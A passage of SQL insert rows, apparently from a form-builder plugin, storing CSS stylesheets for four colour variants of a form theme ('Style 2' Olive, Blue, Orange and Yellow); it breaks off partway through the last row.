(9, 'Style 2 Olive', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, wdform_table1{\n		border:inherit !important;\n		padding:inherit;\n		margin:inherit !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\ntable.wdform_table1 {\nborder-collapse: initial !important;\n}\n.wdform_footer td{\ntext-align:center !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2{\n	width:initial;\n}\n .wdform_table1 tbody{\n	 border-collapse:inherit !important;\n }\n .page_numbers{\n	vertical-align:middle !important;\n}\n .wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 td{\n	margin:inherit !important;\n	border-collapse:inherit !important;\n	padding:inherit !important\n}\n.wdform_table1 tr{\n	margin:inherit !important;\n}\n.wdform_table2 table{\n		width: inherit !important;\n		background-color:inherit !important;\n}\n.file_upload{\n		font-size:12px !important;\n}\n.wdform_table1 button\n{\n		background-image:none !important;\n}\n.calendar, .calendar tr, .calendar td, .calendar table{\n		border-collapse:inherit;\n		padding:inherit;\n		margin:inherit;\n}\n.button, .button_reset, .button_submit{\n		padding-bottom:inherit !important;\n		padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n		text-align:inherit;\n		vertical-align:middle;\n		border:none !important;\n		padding:inherit  !important;\n		margin-bottom: inherit !important;\n		margin-top: inherit !important;\n}\n.wdform_table2 td, .wdform_table2 tr{\n	vertical-align:top !important;\n	text-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n		color:#000;\n		line-height:1 !important;\n		margin-bottom:2px !important;\n		margin-top:2px !important;\n		font-size:inherit !important; \n		display:inline !important;\n        padding-left:inherit !important;\n		padding-right:inherit !important;\n}\n.wdform_table1 input{\n	padding-bottom:2px !important;\n	padding-top:2px !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 10px !important;\nborder: 2px solid black !important;\nwidth: 100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#778F1D !important;\nborder:1px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:0px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_input input {\nborder-radius: 0px !important;\nborder-width: 1px !important;\npadding: 1px !important;\nmargin: 1px !important;\nheight: 16px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:21px !important;\nfont-size:12px !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_select select \n{\nborder-radius: 0px !important;\npadding: 1px !important;\nmargin: 1px !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.time_box\n{\nborder-width:1px !important;\nheight:16px !important;\nmargin: 1px !important;\npadding: 1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload {\nborder: 0px solid white !important;\nborder-radius: 0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor: black !important;\nbackground-color: white !important;\n} \n.page_deactive\n{\ncolor:#ffffff !important;\nborder: 1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#778F1D !important;\n}\n.page_active\n{\ncolor:#000000 !important;\nfont-weight:bold !important;\nborder: 3px double black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#ffffff !important;\nbox-shadow: 0px 0px 0px 0px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:20px !important;\nline-height:20px !important;\nbackground-color:#778F1D !important;\nborder-radius: 0em 4em 1em 0em !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: inset -5px 1px 10px 1px #ACB8A6 !important;\n}\n.page_percentage_deactive\n{\nheight:20px !important;\nline-height:20px !important;\nborder:1px solid black !important;\nbackground-color:#ffffff !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:5px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#84857D !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.button_reset\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#84857D !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.wdform_button button \n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color: #84857D !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\n}\nbutton.wdform_page_button\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#84857D !important;\nborder: 1px solid  #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}', 0),
(10, 'Style 2 Blue ', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, wdform_table1{\n		border:inherit !important;\n		padding:inherit;\n		margin:inherit !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_footer td{\ntext-align:center !important;\n}\ntable.wdform_table1 {\nborder-collapse: initial !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2{\n	width:initial;\n}\n .wdform_table1 tbody{\n	 border-collapse:inherit !important;\n }\n .page_numbers{\n	vertical-align:middle !important;\n}\n .wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 td{\n	margin:inherit !important;\n	border-collapse:inherit !important;\n	padding:inherit !important\n}\n.wdform_table1 tr{\n	margin:inherit !important;\n}\n.wdform_table2 table{\n		width: inherit !important;\n		background-color:inherit !important;\n}\n.file_upload{\n		font-size:12px !important;\n}\n.wdform_table1 button\n{\n		background-image:none !important;\n}\n.calendar, .calendar tr, .calendar td, .calendar table{\n		border-collapse:inherit;\n		padding:inherit;\n		margin:inherit;\n}\n.button, .button_reset, .button_submit{\n		padding-bottom:inherit !important;\n		padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n		text-align:inherit;\n		vertical-align:middle;\n		border:none !important;\n		padding:inherit  !important;\n		margin-bottom: inherit !important;\n		margin-top: inherit !important;\n}\n.wdform_table2 td, .wdform_table2 tr{\n	vertical-align:top !important;\n	text-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n		color:#000;\n		line-height:1 !important;\n		margin-bottom:2px !important;\n		margin-top:2px !important;\n		font-size:inherit !important; \n		display:inline !important;\n        padding-left:inherit !important;\n		padding-right:inherit !important;\n}\n.wdform_table1 input{\n	padding-bottom:2px !important;\n	padding-top:2px !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 10px !important;\nborder: 2px solid black !important;\nwidth: 100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#3D9EBE !important;\nborder:1px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:0px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_input input {\nborder-radius: 0px !important;\nborder-width: 1px !important;\npadding: 1px !important;\nmargin: 1px !important;\nheight: 16px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:21px !important;\nfont-size:12px !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_select select \n{\nborder-radius: 0px !important;\npadding: 1px !important;\nmargin: 1px !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.time_box\n{\nborder-width:1px !important;\nheight:16px !important;\nmargin: 1px !important;\npadding: 1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload {\nborder: 0px solid white !important;\nborder-radius: 0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor: black !important;\nbackground-color: white !important;\n} \n.page_deactive\n{\ncolor:#ffffff !important;\nborder: 1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#3D9EBE !important;\n}\n.page_active\n{\ncolor:#000000 !important;\nfont-weight:bold !important;\nborder: 3px double black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#ffffff !important;\nbox-shadow: 0px 0px 0px 0px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:20px !important;\nline-height:20px !important;\nbackground-color:#3D9EBE !important;\nborder-radius: 0em 4em 1em 0em !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: inset -5px 1px 10px 1px #ACB8A6 !important;\n}\n.page_percentage_deactive\n{\nheight:20px !important;\nline-height:20px !important;\nborder:1px solid black !important;\nbackground-color:#ffffff !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:5px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#fff !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.button_reset\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#fff !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.wdform_button button \n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color: #fff !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\n}\nbutton.wdform_page_button\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#fff !important;\nborder: 1px solid  #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}', 0),
(11, 'Style 2 Orange', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, wdform_table1{\n		border:inherit !important;\n		padding:inherit;\n		margin:inherit !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\ntable.wdform_table1 {\nborder-collapse: initial !important;\n}\n.wdform_footer td{\ntext-align:center !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n .wdform_table1 tbody{\n	 border-collapse:inherit !important;\n }\n.wdform_table2{\n	width:initial;\n}\n .page_numbers{\n	vertical-align:middle !important;\n}\n .wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 td{\n	margin:inherit !important;\n	border-collapse:inherit !important;\n	padding:inherit !important\n}\n.wdform_table1 tr{\n	margin:inherit !important;\n}\n.wdform_table2 table{\n		width: inherit !important;\n		background-color:inherit !important;\n}\n.file_upload{\n		font-size:12px !important;\n}\n.wdform_table1 button\n{\n		background-image:none !important;\n}\n.calendar, .calendar tr, .calendar td, .calendar table{\n		border-collapse:inherit;\n		padding:inherit;\n		margin:inherit;\n}\n.button, .button_reset, .button_submit{\n		padding-bottom:inherit !important;\n		padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n		text-align:inherit;\n		vertical-align:middle;\n		border:none !important;\n		padding:inherit  !important;\n		margin-bottom: inherit !important;\n		margin-top: inherit !important;\n}\n.wdform_table2 td, .wdform_table2 tr{\n	vertical-align:top !important;\n	text-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n		color:#000;\n		line-height:1 !important;\n		margin-bottom:2px !important;\n		margin-top:2px !important;\n		font-size:inherit !important;\n		display:inline !important;\n        padding-left:inherit !important;\n		padding-right:inherit !important;\n}\n.wdform_table1 input{\n	padding-bottom:2px !important;\n	padding-top:2px !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 10px !important;\nborder: 2px solid black !important;\nwidth: 100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#FF832B !important;\nborder:1px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:0px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_input input {\nborder-radius: 0px !important;\nborder-width: 1px !important;\npadding: 1px !important;\nmargin: 1px !important;\nheight: 16px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:21px !important;\nfont-size:12px !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_select select \n{\nborder-radius: 0px !important;\npadding: 1px !important;\nmargin: 1px !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.time_box\n{\nborder-width:1px !important;\nheight:16px !important;\nmargin: 1px !important;\npadding: 1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:blue\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload {\nborder: 0px solid white !important;\nborder-radius: 0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor: black !important;\nbackground-color: white !important;\n} \n.page_deactive\n{\ncolor:#ffffff !important;\nborder: 1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#FF832B !important;\n}\n.page_active\n{\ncolor:#000000 !important;\nfont-weight:bold !important;\nborder: 3px double black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#ffffff !important;\nbox-shadow: 0px 0px 0px 0px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:20px !important;\nline-height:20px !important;\nbackground-color:#FF832B !important;\nborder-radius: 0em 4em 1em 0em !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: inset -5px 1px 10px 1px #ACB8A6 !important;\n}\n.page_percentage_deactive\n{\nheight:20px !important;\nline-height:20px !important;\nborder:1px solid black !important;\nbackground-color:#ffffff !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:5px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000000 !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.button_reset\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000000 !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.wdform_button button \n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color: #000000 !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\n}\nbutton.wdform_page_button\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000000 !important;\nborder: 0px solid  #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}', 0),
(12, 'Style 2 Yellow ', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, wdform_table1{\n		border:inherit !important;\n		padding:inherit;\n		margin:inherit !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\ntable.wdform_table1 {\nborder-collapse: initial !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_footer td{\ntext-align:center !important;\n}\n.wdform_table2{\n	width:initial;\n}\n .wdform_table1 tbody{\n	 border-collapse:inherit !important;\n }\n .page_numbers{\n	vertical-align:middle !important;\n}\n .wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 td{\n	margin:inherit !important;\n	border-collapse:inherit !important;\n	padding:inherit !important\n}\n.wdform_table1 tr{\n	margin:inherit !important;\n}\n.wdform_table2 table{\n		width: inherit !important;\n		background-color:inherit !important;\n}\n.file_upload{\n		font-size:12px !important;\n}\n.wdform_table1 button\n{\n		background-image:none !important;\n}\n.calendar, .calendar tr, .calendar td, .calendar table{\n		border-collapse:inherit;\n		padding:inherit;\n		margin:inherit;\n}\n.button, .button_reset, .button_submit{\n		padding-bottom:inherit !important;\n		padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n		text-align:inherit;\n		vertical-align:middle;\n		border:none !important;\n		padding:inherit  !important;\n		margin-bottom: inherit !important;\n		margin-top: inherit !important;\n}\n.wdform_table2 td, .wdform_table2 tr{\n	vertical-align:top !important;\n	text-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n		color:#000;\n		line-height:1 !important;\n		margin-bottom:2px !important;\n		margin-top:2px !important;\n		font-size:inherit !important; \n		display:inline !important;\n        padding-left:inherit !important;\n		padding-right:inherit !important;\n}\n.wdform_table1 input{\n	padding-bottom:2px !important;\n	padding-top:2px !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1\n{\nfont-size:14px !important; \nfont-weight:normal !important; \ncolor:#000000 !important; \nborder-spacing: 10px !important; \nborder: 2px solid black !important; \nwidth: 100% !important; \n}\n.wdform_tbody1\n{\nbackground-color:#FFF000 !important; \nborder:1px solid black !important; \ntext-align:center !important; \nborder-radius:0px !important; \nfloat:left !important; \nwidth: 100% !important; \n}\n.wdform_tr1\n{\nvertical-align:top !important; \nwidth:100% !important; \n}\n.wdform_table2\n{\npadding-right:0px  !important; \npadding-left:30px  !important; \nfloat:left !important; \nborder-spacing: 2px !important; \nborder-collapse:separate  !important; \n}\n.wdform_tr_section_break td\n{\npadding-right:20px  !important; \npadding-left:20px  !important; \nwidth:100% !important; \n}\n.wdform_input input {\nborder-radius: 0px !important; \nborder-width: 1px !important; \npadding: 1px !important; \nmargin: 1px !important; \nheight: 16px !important; \n}\n.wdform_address input\n{\nborder-radius:0px !important; \nheight:16px !important; \nfont-size:12px !important; \n}\n.wdform_address select\n{\nborder-radius:0px !important; \nheight:21px !important; \nfont-size:12px !important; \n}\n.wdform_date_fields select\n{\nborder-radius:0px !important; \nheight:21px !important; \nfont-size:12px !important; \npadding:1px !important; \nmargin:1px !important; \n}\n.wdform_select select \n{\nborder-radius: 0px !important; \npadding: 1px !important; \nmargin: 1px !important; \n}\n.wdform_date_fields input\n{\nborder-radius:0px !important; \nborder-width: 1px !important; \nheight:16px !important; \nfont-size:12px !important; \npadding:1px !important; \nmargin:1px !important; \n}\n.time_box\n{\nborder-width:1px !important; \nheight:16px !important; \nmargin: 1px !important; \npadding: 1px !important; \ntext-align:right !important; \nwidth:30px !important; \nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important; \nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important; \ncolor:#000 !important; 